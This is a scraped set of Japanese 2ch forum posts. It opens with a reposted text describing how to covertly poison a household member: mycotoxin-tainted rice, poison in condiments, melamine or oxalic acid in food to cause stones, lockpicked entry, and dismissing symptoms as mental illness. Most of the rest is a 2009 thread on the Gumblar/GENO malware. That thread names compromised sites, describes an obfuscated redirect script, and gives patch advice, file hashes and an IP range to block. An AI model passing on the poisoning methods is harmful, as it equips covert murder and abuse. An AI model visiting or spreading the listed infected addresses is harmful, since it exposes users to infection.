汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html
  夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
  精神的に追詰められる心理サスペンスの傑作!  
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
 ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
182名無しさん@お腹いっぱい。:2009/05/09(土) 08:05:36
ここ反応するんだけどどう?
ttp://www.freaksstore.com/
183名無しさん@お腹いっぱい。:2009/05/09(土) 08:35:12

EXQAUTOのウェブサイトもやられたね。
連休中は死亡状態だったが、今は復旧している模様。
但し、感染にかんするコメントは出されていない。
(闇に葬った可能性大!)

5月6日までにアクセスした人はクリーンインストールよろ。
184名無しさん@お腹いっぱい。:2009/05/09(土) 08:51:08
マジで被害広がってるじゃん。
世間じゃ全く話題にならないけど…
185名無しさん@お腹いっぱい。:2009/05/09(土) 09:16:49
>>182
www.freaksstore.com のウェブサイトに含まれている gumblar.cn のサイトの要素に、
コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性が
あります。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する
場合があります。
186名無しさん@お腹いっぱい。:2009/05/09(土) 09:33:15
>>184
まぁいいんじゃね?
そのうち職場のやつらが騒ぎ出したら笑いこらえるのがタイヘン
187名無しさん@お腹いっぱい。:2009/05/09(土) 09:40:24
>>182
難読化されたJSコードが挿入されている。
UAを調べてVista未満のWindowsだとgumblar.cnに飛ばす。
188名無しさん@お腹いっぱい。:2009/05/09(土) 09:46:38
Genoウィルス怖いねー
189名無しさん@お腹いっぱい。:2009/05/09(土) 09:54:42
>>182
何で反応したの?
190名無しさん@お腹いっぱい。:2009/05/09(土) 10:18:36
AVG
191名無しさん@お腹いっぱい。:2009/05/09(土) 10:18:46
192189:2009/05/09(土) 10:24:19
>>191
そのIDの人とは、別人です。GENOも最初見つかったときは、対応しているセキュリティ
ソフト少なかったから未知のウィルスの対応ってどうすれば、いいのかな?って思って質問
したのです。さっきのリンク先は、URLチェッカーだと安全って表示されてたしね
193189:2009/05/09(土) 10:26:13
リンク先飛んだんだが、javaきってるからAVGが反応してくれるのか分かんないよ・・・
194名無しさん@お腹いっぱい。:2009/05/09(土) 10:35:15
gumblar.cnはgeno以上に活動してるな
195名無しさん@お腹いっぱい。:2009/05/09(土) 10:41:21
>>187
アドレス変わったのか

zlkonは途中で経路切られて終了かと思ったのに
196名無しさん@お腹いっぱい。:2009/05/09(土) 10:43:03
197名無しさん@お腹いっぱい。:2009/05/09(土) 10:49:30
ここも参考になります
ttp://ilion.blog47.fc2.com/blog-entry-128.html
198名無しさん@お腹いっぱい。:2009/05/09(土) 10:50:36
>>194
どうしてもガンダムに見えるんだよなぁ
199名無しさん@お腹いっぱい。:2009/05/09(土) 11:05:39
なぁなぁ、感染してるっぽいサイトをGoogleで検索しただけでavast先生が警告するんだが
これってどうなってるの?
ひょっとして対策してなかったらググっただけで即感染するのか?

例)「村民」で検索したら一番最初に出てくる村民バスのうんたら〜ってサイトが感染してる
らしくavast先生が反応する。
※当然だけど試すなら対策してからやってくれ
200名無しさん@お腹いっぱい。:2009/05/09(土) 11:30:38
>>199
これも>>182と同じだな。難読化のやり方は違うけど処理はまったく同じ。
avastがどう判断してるのかわからないけど、
ググっただけで感染するのはGoogleが改竄されたときだけ。
201名無しさん@お腹いっぱい。:2009/05/09(土) 12:10:18
>>199やっかいだな
対応していないアンチウイルスソフトが多すぎる
202名無しさん@お腹いっぱい。:2009/05/09(土) 12:16:02
Adobe ReaderとFlash Playerを最新版にして、Javascriptを無効にしてても
感染しちゃうのでしょうか?

203名無しさん@お腹いっぱい。:2009/05/09(土) 13:12:50
散布元がこれだけファイルをコロコロ変えてくるとシグネチャ定義では対応できません。
204名無しさん@お腹いっぱい。:2009/05/09(土) 14:23:41
>>202
感染します。
感染後の、AdobeReaderを利用した動作部分のみ行なえないだけで、他の動作はするでしょうね。
常駐してftpサイト更新を検知したら〜とか。コマンドプロンプト出そうとしたら起動できないとか。

ほぼ日替わりで本体が入れ代わってるので、その日に、どんなものが落ちてきて実行されるかなんて
わかりません。業者の方が撤退しない限りは、PG2などで、gumblar.cn の範囲をブロックするのが有効です。
205名無しさん@お腹いっぱい。:2009/05/09(土) 14:44:46
Javascript無効なら感染しないんじゃないの?
206名無しさん@お腹いっぱい。:2009/05/09(土) 15:23:05
>>202の条件なら、しねぇだろ
207名無しさん@お腹いっぱい。:2009/05/09(土) 15:36:15
お気に入りの通販サイトなんかあったらjavascript有効にするだろうから
普通のサイトが突如ウイルス拡散することになるのは恐怖だな。
208名無しさん@お腹いっぱい。:2009/05/09(土) 16:25:44
さっきPDF開くようなサイトじゃないのにAdobe ReaderがJavaScriptがONじゃないと表示されないよと
警告してきた。Adobe Reader9のJavaScriptは切ってる。これはもしや引掛ったか?
209名無しさん@お腹いっぱい。:2009/05/09(土) 16:27:43
>>199
感染するかは分からないけど、先読み無効に出来るみたい。

ttp://www.google.com/help/features.html

リンク先読み機能 - プリフェッチ

一部の Google 検索については、ユーザーがクリックする前に最上位の検索結果のダウンロードを開始しています。
そのため、最上位の結果をクリックすると、リンク先ページが高速で読み込まれます。

この特殊なプリフェッチ機能は Firefox および Mozilla ウェブ ブラウザだけで、Internet Explorer などの他のブラウザではご利用いただけません。
Mozilla のプリフェッチ FAQ に記載されているとおり、プリフェッチ機能はウェブ ブラウザの設定で無効にできます。
Firefox でプリフェッチを無効ににする方法:

アドレス バーに「about:config」と入力します。
「network.prefetch-next」の設定まで下にスクロールし、値を「False」に設定します。
210名無しさん@お腹いっぱい。:2009/05/09(土) 16:34:11
>>208
リンクされない程度に削ってURLうpおね
211名無しさん@お腹いっぱい。:2009/05/09(土) 16:39:21
>>210
h++p://cmd-pro.com/m_com.html
212名無しさん@お腹いっぱい。:2009/05/09(土) 16:48:59
>>209
先読みが静的データとしてバックグラウンドで読んでるならいいのだが、違ったら感染するな
213名無しさん@お腹いっぱい。:2009/05/09(土) 17:44:21
>>211
gumblar.cnだな。
あと、そこと同じようなレイアウトのサイトが他にもいくつかあるんだが、
もし管理者が同じ人物なんだとするとftp経由で軒並み改竄されるかもしれない。
ちょっと確認したところでは
www■wa-purokentei■com
は改竄済み。
214名無しさん@お腹いっぱい。:2009/05/09(土) 17:50:49
>>208
Adobe側のScriptをオフにしといたんだろ?
メッセージを鵜呑みにしてオンにしなきゃセーフ
215名無しさん@お腹いっぱい。:2009/05/09(土) 17:51:38
>>213
了解した。サイト管理者に通告すべきだな。
あと、acroreadのJavaScript切ってたら大丈夫だろうか…
今a-squaredでスキャン中なのだが。
216名無しさん@お腹いっぱい。:2009/05/09(土) 17:53:50
>>214
ONにはしなかった。一応だけど調査継続しておく。
217名無しさん@お腹いっぱい。:2009/05/09(土) 20:00:26
>>216
切ったままでオンにしなきゃ大丈夫。
その状態でわざと踏んで検体拾って送ったりしてるんで。
218名無しさん@お腹いっぱい。:2009/05/09(土) 20:33:41
>>217
だが結局はAdobeだ。死ぬなよ。
219名無しさん@お腹いっぱい。:2009/05/09(土) 20:52:47
>>218
今のところ平気。

ちなみにFoxit用のコードも実戦投入されているので
FoxitもScript切らないとだめくさ(設定箇所は同じ)。
220名無しさん@お腹いっぱい。:2009/05/09(土) 21:09:28
>>212
それはまずい
けど、そんなに問題ならもっと以前から騒がれてる気がするけど
結構昔からついてる機能みたいだし
221名無しさん@お腹いっぱい。:2009/05/09(土) 21:28:47
これに感染したっぽくてバックアップデータを取って
OSを再インストールしたいんだけど
インスコし直したPCにバックアップデータを入れても
ウイルスってついてこないのかな?
こういった感染例ってありますか?
新OSでスキャンして反応なかったら大丈夫なのかな
222名無しさん@お腹いっぱい。:2009/05/09(土) 22:14:10
管理してるサイトに置いてあったPHPに例の一行目と、HTMLにjsが追加されてるのを発見
クライアントPCは感染していないのを確認
実は数日前、レンタルサーバー屋さんに速度がらみでのなにかしらの処理をしてもらった
のだが、これが原因ということはありますかね?
サーバー屋さんが感染してるとか…
223名無しさん@お腹いっぱい。:2009/05/09(土) 22:23:19
>>199
>>209
コワーイ
224名無しさん@お腹いっぱい。:2009/05/09(土) 22:28:35
>>221
単純にそれだけ聞く分にはまだダメじゃないか?

・FTP他のパスワードを新環境側から変更する
・手持ちのHTML系データは手作業で感染チェックする
・バックアップソフトで一括バックアップはしない
・アンチウィルスが全て対策してるわけではないので、信用しすぎない

HTMLの手動チェックは辛いところだが、他は最低限気にすべきかと思う
225名無しさん@お腹いっぱい。:2009/05/09(土) 22:40:49
226名無しさん@お腹いっぱい。:2009/05/09(土) 23:59:43
これだけ感染が拡大してるのに世間の盛り上がらなさは異常。
227名無しさん@お腹いっぱい。:2009/05/10(日) 00:25:03
正規サイト改ざん:国交省、全日本民医連、NHT紀尾井町グループ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1876

以前の薬事日報といい、医療関係を軸に広がりを見せてる??
紀尾井町のも自毛植毛だから整形外科で医療扱いだし
岐阜はワカラン
228名無しさん@お腹いっぱい。:2009/05/10(日) 00:29:46
>>222
どうだろうね。
ftpのパスを抜かれて改竄されるみたいなんで
鯖屋さんがftp経由で更新してたらその可能性もあるかも。

あとクライアントPCが感染してないと判断した根拠が何なのかってのも問題になる。
この種類の攻撃だとdropperも本体もサーバ側で入れ替えし放題なので、
アンチウィルスで検出できないだけでクライアントPCが実は感染してましたってことも考えられる。
229名無しさん@お腹いっぱい。:2009/05/10(日) 01:59:35
>>227
全体的に広がってるけどちゃんと対応するのが医療関係だけで
ほかはもみ消したり気づいてなかったりするかんじ
230名無しさん@お腹いっぱい。:2009/05/10(日) 02:25:26
GENOとしては「うちだけじゃないからw」ってことで一安心だろう。
231名無しさん@お腹いっぱい。:2009/05/10(日) 06:36:56
gumblar.cn踏んだ後にUDP52468で色んな所からアタック来ない?
232名無しさん@お腹いっぱい。:2009/05/10(日) 08:46:58
>>230
糞みたいな対応したのは数少ないけどねたぶんw
233名無しさん@お腹いっぱい。:2009/05/10(日) 09:16:11
GENOから感染したってのが多いだろ
234名無しさん@お腹いっぱい。:2009/05/10(日) 09:29:00
5月1日時点のGENOウイルス感染数(初期GENOウイルス)


日本 13,024件


・・・・・・・・・・・・・・・・・・・・・・・・・・・。
235名無しさん@お腹いっぱい。:2009/05/10(日) 11:38:32
なあ、このウイルスってもうYahooのトップで警告しなきゃならないくらいのレベルだよな?
削除があまりにも難しく、しかも亜種が続々。

なんでダンマリなの?
236名無しさん@お腹いっぱい。:2009/05/10(日) 11:44:11
詳細が不明だから
237名無しさん@お腹いっぱい。:2009/05/10(日) 21:49:23
照英のサイト改竄は芸能人だし、これをきっかけに
ニュースにもでもなるかと思ったけど静かなもんだね
238名無しさん@お腹いっぱい。:2009/05/10(日) 23:50:03
IPAすらGENOウイルス自体を知っているとも思えないが。
239名無しさん@お腹いっぱい。:2009/05/10(日) 23:51:15
IPAは身内が感染しちゃうぐらいだしなぁw
240名無しさん@お腹いっぱい。:2009/05/10(日) 23:52:18
>>124
>>127

必死
241名無しさん@お腹いっぱい。:2009/05/10(日) 23:54:23
誤爆か
242名無しさん@お腹いっぱい。:2009/05/11(月) 02:27:01
PC通販ショップ「GENO」が不正アクセスで不具合 今回のトラブルについてのお詫び
http://gimpo.2ch.net/test/read.cgi/owabiplus/1239264401/l50

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/l50

【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/l50

【新種ウイルス】GENOを語るスレ31【無料配布中】
http://pc11.2ch.net/test/read.cgi/pc/1239197673/l50

【ウイルス】GENOを語るスレ31【完治】
http://pc11.2ch.net/test/read.cgi/pc/1239199378/l50

【ウイルス被害】GENOを語るスレ32【謝罪なし】
http://pc11.2ch.net/test/read.cgi/pc/1241248612/l50
243名無しさん@お腹いっぱい。:2009/05/11(月) 02:28:38
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50

【8BOAA】 GENOを語るスレ26 【zif付き】
http://pc11.2ch.net/test/read.cgi/notepc/1232024693/l50

★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50

【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/l50
244名無しさん@お腹いっぱい。:2009/05/11(月) 17:21:12
IPAにso-netのセキュリティ通信が上手く纏まってるので見ろと
役立たずのIPAは解散しろと言っておきました

これで少なくとも把握してないと言う事にはならないでしょう
245名無しさん@お腹いっぱい。:2009/05/11(月) 19:01:35
gumblarをブログに書いたら
その記事にLACからアクセスあったので
知らないとは言わせない(´・ω・)ス

# あとはJPCERTか?
246名無しさん@お腹いっぱい。:2009/05/11(月) 20:28:13
結構、企業からも個人がアクセスしているだろうから、そのうちとんでもないことに
247名無しさん@お腹いっぱい。:2009/05/11(月) 21:14:15
>>244
so-netのセキュリティ通信便利だよね、よくまとまってるし
一般人にもすすめ易い
必ずしも速報性はないけど大手にしては上出来
アンテナとしてキュリティホールmemo見てるけど、他の人にはすすめにくいからなあ
他に一般人向けでそこそこ情報補足が早いとこ知ってる人いる?
248名無しさん@お腹いっぱい。:2009/05/11(月) 21:31:37
テレビやラジオで少しの時間で良いからインターネットのセキュリティに関するニュースを毎日流して欲しいと思っています。
249名無しさん@お腹いっぱい。:2009/05/12(火) 00:22:29
>>247
一連の記事、なんか違和感があると思ったら、「Adobe」が軒並み[Adbe」に
なってるんだな。
250名無しさん@お腹いっぱい。:2009/05/12(火) 00:41:18
>>249
ほんとだw
対策方法の情報ページのはじめの3つだけAdbeになってる
教えてあげたら寸志もらえるかな?w
251名無しさん@お腹いっぱい。:2009/05/12(火) 00:52:03
「ご指摘ありがとうございました」の返信だけだろ
252名無しさん@お腹いっぱい。:2009/05/12(火) 01:03:54
これって検出するのはどうしたらいいの?
253名無しさん@お腹いっぱい。:2009/05/12(火) 01:10:13
>>252
感染の可能性を低くする方法はあるが、検出できるかどうかは運次第。
どんどん新型に置き換わってるから、アンチウィルスもシグネチャベースの対応は
追いついていない。
254名無しさん@お腹いっぱい。:2009/05/12(火) 01:26:41
じゃあおまえらは
どうやって気付いたの?
255名無しさん@お腹いっぱい。:2009/05/12(火) 01:32:53
>>254
Chromeが遮断してくれた。運がよかった。
256名無しさん@お腹いっぱい。:2009/05/12(火) 01:49:29
>>254
いつものようにGENOのサイトをひやかしにいったら、なんか重くてブラウザハングしたから
同じ様な奴を捜しに2ちゃんでスレ探して、ウィルス感染に気づいてクリーンインストールw
257名無しさん@お腹いっぱい。:2009/05/12(火) 01:52:41
どんどん新型でてるなあ
258名無しさん@お腹いっぱい。:2009/05/12(火) 02:04:38
それで結局、
どうやったら検出できるんだよ??
259名無しさん@お腹いっぱい。:2009/05/12(火) 02:07:03
あはは
260名無しさん@お腹いっぱい。:2009/05/12(火) 02:51:13
これって
AdobeReader7.1.1 と
FlashPlayerを最新にすると感染しないの?
261名無しさん@お腹いっぱい。:2009/05/12(火) 02:53:54
262名無しさん@お腹いっぱい。:2009/05/12(火) 02:55:13
263名無しさん@お腹いっぱい。:2009/05/12(火) 03:22:27
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
(7.1.1以前)と書いてあるが・・?
264名無しさん@お腹いっぱい。:2009/05/12(火) 03:33:34
この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン(7.1.1以前)に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている
265名無しさん@お腹いっぱい。:2009/05/12(火) 04:10:56
最近落ち着いてるがいつ暴れだすか分からないからスレが閉じれない
まるでインフルエンザだウィルス繋がりでも
266名無しさん@お腹いっぱい。:2009/05/12(火) 11:34:08
>>171もGENOっぽいけどserver.maido3.comは鯖が違うからセーフ?
267名無しさん@お腹いっぱい。:2009/05/12(火) 11:38:03
adobeの対策版予定は今日だったな
時差の関係で夕方くらいかな?
268名無しさん@お腹いっぱい。:2009/05/12(火) 12:06:39
H1N1よりもこっちのほうがpandemicになってるのに
マスコミは全く取り上げないな
269名無しさん@お腹いっぱい。:2009/05/12(火) 12:32:28
都合の悪いことは先が見えるまで後回しが基本だからな
270名無しさん@お腹いっぱい。:2009/05/12(火) 12:48:45
今日は月例UPdateだね
271名無しさん@お腹いっぱい。:2009/05/12(火) 13:20:05
PowerPointしかないからどうでもいいけどな
それよりAdobe仕事しろ
272名無しさん@お腹いっぱい。:2009/05/12(火) 13:35:13
Microsoftセキュリティ対策センター(MSRC)のブログによれば、
今回はOffice関連のアップデートとなるため、Windows Update経由では
配布せず、Microsoft Updateサービスを通じての提供となる。

 セキュリティ情報と併せて、悪意のあるソフトウェアの削除ツール
更新版と、セキュリティ以外のアップデートもリリース予定だ。
273名無しさん@お腹いっぱい。:2009/05/12(火) 18:40:01
Windows7登場は年末にずれ込んだんですね

年末には何が起きるんでしょうかww
274名無しさん@お腹いっぱい。:2009/05/12(火) 19:09:05
Windows7発売
豚インフルが変異し強毒性を得て大流行
世界的大恐慌
来年には世界的戦争状態に
もうメシウマで今からおしっこ漏れそうです
275名無しさん@お腹いっぱい。:2009/05/12(火) 22:15:29
>>248
GENOみたいに対応を全くしないで放置してる情報が流れたらえらい事になりますw
短縮URLテロどころじゃないですよ
276名無しさん@お腹いっぱい。:2009/05/12(火) 22:54:19
>>275
情報なしで、2ちゃんで感染サイトを貼り付けられまくると
感染者増えるじゃね?
277名無しさん@お腹いっぱい。:2009/05/12(火) 23:17:31
しかしAdobeは糞だなぁ
Adobe ReaderもCommon Filesのadobe_update.exeも
自動更新はオフにしてるのにそれでも外に出ようとする
行儀悪すぎ
278名無しさん@お腹いっぱい。:2009/05/12(火) 23:23:04
消せないファイルが残るしな
279名無しさん@お腹いっぱい。:2009/05/13(水) 00:27:16
消せないファイルあったなー
どうやっても消せなくていろいろやったあとゴミ箱にドラックしたら普通に捨てれた
280名無しさん@お腹いっぱい。:2009/05/13(水) 01:16:07
そのファイル、今ごろゴミ箱の中で繁殖してるぞ
281名無しさん@お腹いっぱい。:2009/05/13(水) 01:26:47
windowsからじゃ消せなかった気がするが・・・
knoppixから消したんだけど、結局気持ち悪いからOSごと入れなおした
ゴミ箱ドラッグは試してなかったかも
282名無しさん@お腹いっぱい。:2009/05/13(水) 02:38:17
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/
283名無しさん@お腹いっぱい。:2009/05/13(水) 03:19:56
キタ━━━━(゚∀゚)━━━━!!!
284名無しさん@お腹いっぱい。:2009/05/13(水) 03:29:19
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
http://tsushima.2ch.net/test/read.cgi/news/1242145955/

申し訳ありません。更新に使っていたPCが、
通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。

5月12日 午前6時31分〜午前8:00頃
・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
・SayMove!のトップページ
同日 午前6時31分〜正午頃
・ニコニコのぞき見検索のマイリスト表示ページ


http://tokkablog.blog81.fc2.com/

http://say-move.net/
(現在は対処済み?)
285名無しさん@お腹いっぱい。:2009/05/13(水) 03:54:09
286名無しさん@お腹いっぱい。:2009/05/13(水) 04:51:41
sqlsodbc.chmってどうやってみつけるんだ?無いのだが・・・
287名無しさん@お腹いっぱい。:2009/05/13(水) 05:05:25
感染しているか確認
どうやら感染するとC:\WINDOWS\system32\sqlsodbc.chmが上書きされる様子
これのハッシュ値を確認してみるといいかも
ファイルサイズが大きく違うのでよくわかんなかったらそっちでどうぞ
作成日時や更新日時は環境によってバラバラなのでとりあえず無視してもOK

正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3

上書きされたsqlsodbc.chmの例(あくまで例でありこの限りではない)
ファイルサイズ:1,323 バイト
CRC32:7585CBB6
MD5:BF7209B9589AD09A25740F6D47D0ADEA
SHA-1:D695F957AA9DEB0E4D92F4546DB3A883B1909008


とりあえずこれチェックして大丈夫なら安心だろ
288名無しさん@お腹いっぱい。:2009/05/13(水) 06:00:22
僕達の感染はこれからだ!

GENO先生の次回作にご期待ください。
289名無しさん@お腹いっぱい。:2009/05/13(水) 06:49:57
げろの名が大きく広まった事件であった
その事件は未だ解決までに至っていない
290名無しさん@お腹いっぱい。:2009/05/13(水) 06:55:06
>>287
sqlsodbc.chmの正常な値はインストールされているSQL ServerやMSDEの
バージョンによって違うよ。
291名無しさん@お腹いっぱい。:2009/05/13(水) 06:58:09
>>287
なんの意味もないチェックだろこれ
292名無しさん@お腹いっぱい。:2009/05/13(水) 07:29:10
ttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows
Adobe Reader 9.1.1 Update - Multiple Languages     5/12/2009
Adobe Reader 8.1.5 Update - Multiple Languages          5/12/2009

これで安心?かな
293名無しさん@お腹いっぱい。:2009/05/13(水) 07:42:48
>>287
んなアホな。
294名無しさん@お腹いっぱい。:2009/05/13(水) 07:54:33
http://www.adobe.com/support/downloads/detail.jsp?ftpID=4447
Adobe Reader 7.1.2 Update - Multiple Languages      5/12/2009

今日仕事、一日中インストールしまくりだな
295名無しさん@お腹いっぱい。:2009/05/13(水) 10:07:22
SayMove!について語るスレ part2
http://pc12.2ch.net/test/read.cgi/streaming/1241252349/
SayMove!について語るスレ part3
http://pc12.2ch.net/test/read.cgi/streaming/1242174048/
ぱらすての次はsaymoveの時代だ!【本スレ】
http://pc12.2ch.net/test/read.cgi/streaming/1239969531/
296名無しさん@お腹いっぱい。:2009/05/13(水) 10:21:31
ウィルス感染してるか調べる明確な方法はないのだろうか
297名無しさん@お腹いっぱい。:2009/05/13(水) 11:07:49
>>292
インストーラは9.1.0のままなので
[ヘルプ][アップデートの有無をチェック]で
9.1.1にしておくこと(とっくに9.1.0の人も)。
298名無しさん@お腹いっぱい。:2009/05/13(水) 11:18:53
>>292のとこアップデートのあるよ
299名無しさん@お腹いっぱい。:2009/05/13(水) 11:33:27
すまん、これのリンク先のこと
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html
300名無しさん@お腹いっぱい。:2009/05/13(水) 12:15:34
Adobe Reader 7/8/9すべて対策が講じられたということでいいのかな?
301名無しさん@お腹いっぱい。:2009/05/13(水) 12:23:36
んだね。もっともパッチ当てない奴が山ほどいそうだが。
302名無しさん@お腹いっぱい。:2009/05/13(水) 12:25:29
進化したGENOウイルスがそれすらいずれ突破してきそうで怖いな
303名無しさん@お腹いっぱい。:2009/05/13(水) 12:33:48
クライアントPCへの侵入経路が今ひとつわからないんだよな。
クライアントPCに対してもWebに仕込まれるのと同様、Adobeの
脆弱性を突かれてるんだろうか。
304名無しさん@お腹いっぱい。:2009/05/13(水) 13:04:10
>>297
「アップデートサーバが応答していません。サーバが一時的にオフラインになっているか
インターネットまたはファイアウォール設定が正しくない場合があります。
後でもう一度やり直してください」

と出るんだがどうしたらいいの?
はぁ、もうこんな生活疲れたよ…
305名無しさん@お腹いっぱい。:2009/05/13(水) 13:04:36
>>294 からパチ拾う。
306名無しさん@お腹いっぱい。:2009/05/13(水) 13:17:06
>>299
だめだ、アクロバットリーダーの7のアップデートがあたんね
くそあどび
307名無しさん@お腹いっぱい。:2009/05/13(水) 13:19:15
糞はお前だ・・・・。
308名無しさん@お腹いっぱい。:2009/05/13(水) 13:49:14
全然おさまらないじゃん、GENOウイルス…
309名無しさん@お腹いっぱい。:2009/05/13(水) 13:56:33
本番はこれからだ!GENOぉぉぉぉぉぉぉぉ!
310名無しさん@お腹いっぱい。:2009/05/13(水) 14:40:31
スイマセン
フラッシュは最新版で
偶然にもアドビリーダー入れてなかったんですが
感染して無いでしょうか
311名無しさん@お腹いっぱい。:2009/05/13(水) 14:46:31
感染してますん
312名無しさん@お腹いっぱい。:2009/05/13(水) 14:46:47
誰かエスパー呼んでこいよ。
313名無しさん@お腹いっぱい。:2009/05/13(水) 14:50:04
好きだと言い出せないうちに あなたのロッカー奪ったラブレター
314名無しさん@お腹いっぱい。:2009/05/13(水) 15:51:18
アンインストールするのが確実
315名無しさん@お腹いっぱい。:2009/05/13(水) 16:26:52
ウイルスのこと何も分からない俺に教えてください・・・
316名無しさん@お腹いっぱい。:2009/05/13(水) 16:27:50
GENOに感染して総再インスコしたんだけど
先にマカフィー入れてからアドビリーダーの最新版を入れようとしたら
バッファーのオーバーフローがどうのセキュリティ面に重大な問題がどうのと警告が出てインストール出来なかった
昨日発表されたパッチがあれば問題なくインストールできるのだろうか…
317名無しさん@お腹いっぱい。:2009/05/13(水) 16:28:37
>>315

 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__ 
     |        |        |   | |\_\  
     |        | ∧_∧ |   | |  |.◎.| 
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |  
318名無しさん@お腹いっぱい。:2009/05/13(水) 16:28:46
>>315
ホムペ持ってないなら気にする必要なし。
319名無しさん@お腹いっぱい。:2009/05/13(水) 16:29:01
adobe readerは8と9どっちがいいの?
320名無しさん@お腹いっぱい。:2009/05/13(水) 16:38:06
>>316
こっちは、インストできたよ
こんなに大変な事態だとIPブロックをしないといけないなー
XPのファイアーウォールってIPブロックの機能ないんだろうか?
321名無しさん@お腹いっぱい。:2009/05/13(水) 17:29:58
sqlsodbc.chmがないんですが、これは異常なんですか?
OSはVistaです
322名無しさん@お腹いっぱい。:2009/05/13(水) 17:31:43
窓の杜 - 【NEWS】Adobe、4月末に公表済みの深刻な脆弱性を修正した「Adobe Reader」v9.1.1を公開
http://www.forest.impress.co.jp/article/2009/05/13/adobereader911.html
323名無しさん@お腹いっぱい。:2009/05/13(水) 17:36:53
>>321
Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思うよ〜
324名無しさん@お腹いっぱい。:2009/05/13(水) 17:38:24
>>318
>>5を見ればわかるけどサイト乗っ取りだけじゃなくゾンビ化するみたいだよ

このへんに出てる
http://www3.atword.jp/gnome/2009/05/09/oldschool-botnet-consists-new-malware-via-gumblar/
http://www3.atword.jp/gnome/2009/05/10/diagnostics-about-gumblars-trojan/
325名無しさん@お腹いっぱい。:2009/05/13(水) 17:41:10
>>319
迷う理由がわからないけど特に8を使う理由がなければ
9で良いと思うよ
326名無しさん@お腹いっぱい。:2009/05/13(水) 17:48:09
>>325
いや、特に8を使う理由はないんだけど、9は不具合が多いって
聞いたもんでw

ありがと
327名無しさん@お腹いっぱい。:2009/05/13(水) 18:19:28
>>324
ゾンビ化…
厄介な。
328名無しさん@お腹いっぱい。:2009/05/13(水) 18:33:10
>>323
ありがとうございます
329名無しさん@お腹いっぱい。:2009/05/13(水) 18:35:42
9は開いた文書の数だけウィンドウが開いて、
タスクバーにボタンが作られるのが気に入らない
330名無しさん@お腹いっぱい。:2009/05/13(水) 19:51:41
>申し訳ありません。更新に使っていたPCが、
>通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
>以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。
>
>5月12日 午前6時31分〜午前8:00頃
>・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
>・SayMove!のトップページ
>同日 午前6時31分〜正午頃
>・ニコニコのぞき見検索のマイリスト表示ページ

の件だけど、Vid-DLとかを経由で動画落しても、感染するの?
331名無しさん@お腹いっぱい。:2009/05/13(水) 19:55:07
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
